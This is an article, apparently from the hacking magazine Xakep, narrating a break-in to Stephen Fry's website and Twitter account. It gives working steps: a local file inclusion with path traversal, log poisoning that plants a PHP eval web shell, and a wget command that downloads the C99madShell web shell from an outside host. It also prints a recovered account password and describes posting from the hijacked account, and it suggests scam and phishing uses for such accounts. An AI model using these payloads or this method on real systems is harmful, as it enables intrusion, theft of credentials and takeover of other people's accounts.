Welcome Guest | RSS

Official Site Of The Xakep 4T english version

Monday, 2018-10-22, 1:06 AM
Main » 2011 » April » 16 » Starry Twitter: Hacking the Stephen Fry account
8:18 AM
Starry Twitter: Hacking the Stephen Fry account

Watching the feeds, one’s can often face the news that another Twitter account of some Britney Spears, John McCain and others of that ilk was hacked. Typically, these hacks do not make much effort and are hacked using "brute force” (stars like to set some simple passwords). But brute force – is not our method. British comedian, "The Hitchhiker's Guide to the Galaxy" and "V - for Vendetta" film star, Stephen Fry, can be taken as an example. I will tell you about how to "fuck” a micro blog famous personality quickly and easily play-by-play.


Let’s start with the thing that the actor's official website is located at http://www.stephenfry.com. It represents a collection of posts from his blog and forum, gathering of advertising banners and some promotional trailers advertising the works of Fry. Also you can see actors’ Tweets on stephenfry.com / clubfry / twitter. Inasmuch as Twitter provides its own API to any interested person, then it seemed logical that the password is stored somewhere in the micro-blog configuration map:). In fact, our ultimate goal is a complete control over the actor twitter-account (twitter.com / stephenfry), currently having 873.496 (!) followers.

Bug Search

First off, let’s inspect the site for some installed public engines. Big slice of luck, here we’ve found my favorite WordPress blog engine and the infamous phpBB forum. After browsing the main blog page source (stephenfry.com / blog), one can observe the following:

<meta name="generator" content="WordPress 2.5.1" />

Unfortunately, at the moment I had no necessary exploits for the 2.5.1 WordPress version at hand, and had to ditch that option.

Then we should know the phpBB forum version. This can be done in different ways, but the most convenient is to follow the link to the engine versions history at stephenfry.com / forum / docs / CHANGELOG.html. Inasmuch as the last change was "Changes since 2.0.20", we can safely bottom-line that the forum version is far beyond a real usability of security vulnerabilities (unless, of course, considering all kinds of XSS and CSRF bugs).

Feeling no great desire to use known XSS for this phpBB version, I asked the great and mighty Google for an advice with the query:

site:stephenfry.com filetype:php

As an answer to this uncomplicated query the search engine gave a lot of references to the actor web site PHP-files. I was immediately interested in the link tephenfry.com/section.php?section=clubfry&subsection=twitter.

Here we have two options: we can either send the database a request with the appropriate parameters, or do template files include.

I made the following request having decided to check the second option immediately:

stephenfry.com/section.php?section=clubfry& subsection=/../../../../../../../../../../../../../../../../etc/passwd%00

At that site engine happily gave the contents of / etc / passwd:). There was found the vulnerability of local include working with null-byte! It's all over bar the shouting – we had just to find out which file can be stuffed with malicious code.

Helpful logs

If you’ve read my article in the last ][ number, you should know about the wonderful way to inject your code through the various symbolic links located in / proc / self / *.

Let’s try using storage of local variables /proc/self/environ:


Unfortunately, / proc / self / environ is not available :(.

Now it’s time to try to include our code to the log files. By trial and error we’ve revealed that Apache error_log locates at /proc/self/fd/2 (we’ll use it cause the access_log of a common web site is certainly about few gigabytes, that would be immune to LFI).

error_log is often written without filtering the referer variable, which can be injected with our PHP-code. The only thing that’s left to do is to cause the error, which will be written to the log file. The most easily achievable is the following error format:

[Sat Jul 11 23:39:21 2009] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /

To get such an error and write our "evil-code” we just need to send a blank header to the appropriate host. You can do it like this:

z:/usr/local/bin/curl.exe "http://www.stephenfry.com/" -H "Host:" --referer ""

As a result, our code will be written to the error_log:

[Sat Jul 11 23:39:21 2009] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /, referer: <?php eval($_GET[cmd]); ?>

- We’ll be able to perform any commands using the following link:

http://www.stephenfry.com/section.php?section=clubfry& subsection=/../../../../../../../../../../../../../../../../proc/self/fd/2%00&cmd=phpinfo();

The Penetration

After further browsing and use of the find. /-Type d-perm 0777 command – we’ve found out that there are several writable directories at the server. I chose / home / fry / public_html / img / blog_thumbs / directory and uploaded the C99madShell (it was named like blog.php) there with wget agent:

http://www.stephenfry.com/section.php?section=clubfry&subsection=/../../../../../../../../../../../../../../../../proc/self/fd/2%00&cmd=system('wget -O /home/fry/public_html/img/blog_thumbs/blog.php http://madnet.name/files/download/9_c99madshell.php');

The main thing is to get the access to the Fry’s adored Twitter. We will start our search with browsing the index.php file source at as / home / fry / public_html:

$aryBlogEntry = fnGetHomepageBlogArray();
$aryBlogStats = fnGetBlogStatsArray();
$aryForumStats = fnGetForumStatsArray();
$strSection = "";
$strSubSection = "";
Then the lib/sf_main.php:
include_once "sf_constants.php";
include_once "sf_db_class.php";
include_once "sf_template.php";
include_once "sf_cache_functions.php";

And at last the lib/sf_constants.php:

// Twitter

As seen, the variable SF_TWITTER_PASSWORD is base64 encoded, so we just have to miss this value through the base64_decode function and we’ll get the final password w41la8yon37wo4.

The ultimate goal has almost been reached! We’ve received the password (by the way, such password seems hardly possible to be found by the brute force). The main thing that has left is to enter the actor's account at twitter.com, and leave there a message for future generations.


Now we enter the twitter.com, fill in the appropriate username and password stephenfry w41la8yon37wo4 and find ourselves logged in to the Fry’s account :). After login the service gives us a simple question: "What are you doing?", which we answer with the following happy phrase "I'll be watching you! From Russia with love :)". Within a few minutes after sending my message, Stephen fans began to post the answers:

RegNomSongs by The Police and Matt Monroe. This is a quiz, right? RT @stephenfry:
I'll be watching you! From Russia with love :)

lokimaros@stephenfry How about how Дмитрий Дмитриевич Шостакович radically
changed your life and listening habits.
NikkiG57@stephenfry tell them about Russia, Wagner and your performance at
valpanna@stephenfry I am afraid, very afraid!
Benn2100@stephenfry I'll be watching you too
thisheartbeatz@stephenfry have fun in RUSSIA! B)
wrathofagony@stephenfry cool in Russia? how is it???
CybrHwk@stephenfry Your in Russia? Where about in Russia are you Stephen?
chriscattaneoRT @stephenfry: I'll be watching you! From Russia with love :) ok
Betty_Bitch@stephenfry and i'll be watching you on dave, from Wales with love :)
sjoes@stephenfry Are you in still Russia?
mio@stephenfry wow o_0 where are you now, Stephen?

It seems like no one guessed that the actor's account was hacked, and the phrase "From Russia with love" does not mean that Fry is in Russia.

Large-scale flash mob

Having seized some "star” personality account at some popular online service, you can arrange not only the large-scale flash mob, but also a full-fledged scam / phishing / spam attack. But, of course, the most amusing thing in such situation was the recent message about the Britney Spears death posted on her Twitter :).

P.S. I deleted that post from his micro-blog a few minutes later, cause my delicate mental organization didn’t allow me to injure a huge army of Stephen Fry fans.


Stephen Fry (Stephen John Fry) - British writer, actor and playwright. The role in ("The Black Adder", "A Bit of Fry and Laurie" and "Jeeves and Wooster") the television comedy series won him glory. Outside the UK Fry is known mainly for the Oscar Wilde role in the "Wilde" (1997) movie. Fry is the author of articles and columns in several leading newspapers and magazines in addition to writing scripts and texts for television, radio, cinema and theater.


The above article is the product of a diseased imagination of the author. Any overlap with existing site is accident. Neither the editors nor the author shall not be liable for any possible damage caused by the materials of this article.

Views: 8367 | Added by: XakepNews | Rating: 5.0/1
Total comments: 0